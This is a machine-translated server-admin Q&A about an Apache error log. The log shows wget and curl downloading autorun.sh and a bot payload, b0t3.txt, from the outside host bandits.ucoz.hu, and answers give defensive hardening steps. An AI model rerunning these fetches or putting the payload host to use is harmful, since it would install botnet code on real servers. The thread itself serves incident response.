Linux

阿帕奇錯誤日誌

  • July 19, 2011

我正面臨著apache的問題。以下日誌顯示在 error_log 文件中。

--15:01:26--  http://bandits.ucoz.hu/autorun.sh
Resolving bandits.ucoz.hu... 193.109.247.50
Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 396 [application/octet-stream]
Saving to: `autorun.sh'

    0K                                                       100% 51.6M=0s

15:01:26 (51.6 MB/s) - `autorun.sh' saved [396/396]

sh: fetch: command not found
 % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                Dload  Upload   Total   Spent    Left  Speed
100   396  100   396    0     0  70387      0 --:--:-- --:--:-- --:--:--     0
connected.
HTTP request sent, awaiting response... 200 OK
Length: 28762 (28K) [text/plain]
Saving to: `b0t3.txt'

    0K .......... .......... ........                        100% 8.75M=0.003s

15:01:27 (8.75 MB/s) - `b0t3.txt' saved [28762/28762]

sh: fetch: command not found
 % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                Dload  Upload   Total   Spent    Left  Speed
100 28762  100 28762    0     0  3434k      0 --:--:-- --:--:-- --:--:-- 13.1M
sh: /usr/bin/lwp-download: /usr/bin/perl: bad interpreter: Permission denied
sh: /usr/bin/perl: Permission denied
--15:01:27--  http://bandits.ucoz.hu/autorun.sh
Resolving bandits.ucoz.hu... 193.109.247.50
Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 396 [application/octet-stream]
Saving to: `autorun.sh'

    0K                                                       100% 31.8M=0s

15:01:27 (31.8 MB/s) - `autorun.sh' saved [396/396]

sh: fetch: command not found
 % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                Dload  Upload   Total   Spent    Left  Speed
100   396  100   396    0     0  48768      0 --:--:-- --:--:-- --:--:--     0

我該如何預防這個問題?

似乎有人試圖使用您可能易受攻擊的網頁之一下載和執行 perl 腳本。- 試圖禁用執行所有解釋器(perl、phyton、curl、c 等)。

  • 我假設它可能是 apache + php,如果是,您可能被禁用:allow_url_fopen = Off,禁用通過 PHP 下載。
  • 添加 httpd mod_security
  • 修復了易受攻擊的網頁腳本
  • 為某些 ips/埠打開傳出防火牆

您在某個地方有一個腳本可以抓取看起來像殭屍網路的腳本,試圖將其保存並在本地執行。這沒有發生,因為它在錯誤文件中。

  • 屏蔽土匪ip$$ though there are probably several more $$
  • 找到那個腳本$$ grep for the bandits url $$
  • 找出該腳本用於檢索文件的內容

$$ block it if you can $$

  • 使用 rkhunter 下載和掃描
  • 查看您的郵件隊列
  • 注意你的程序列表中的奇怪的東西

-肖恩

引用自:https://serverfault.com/questions/291840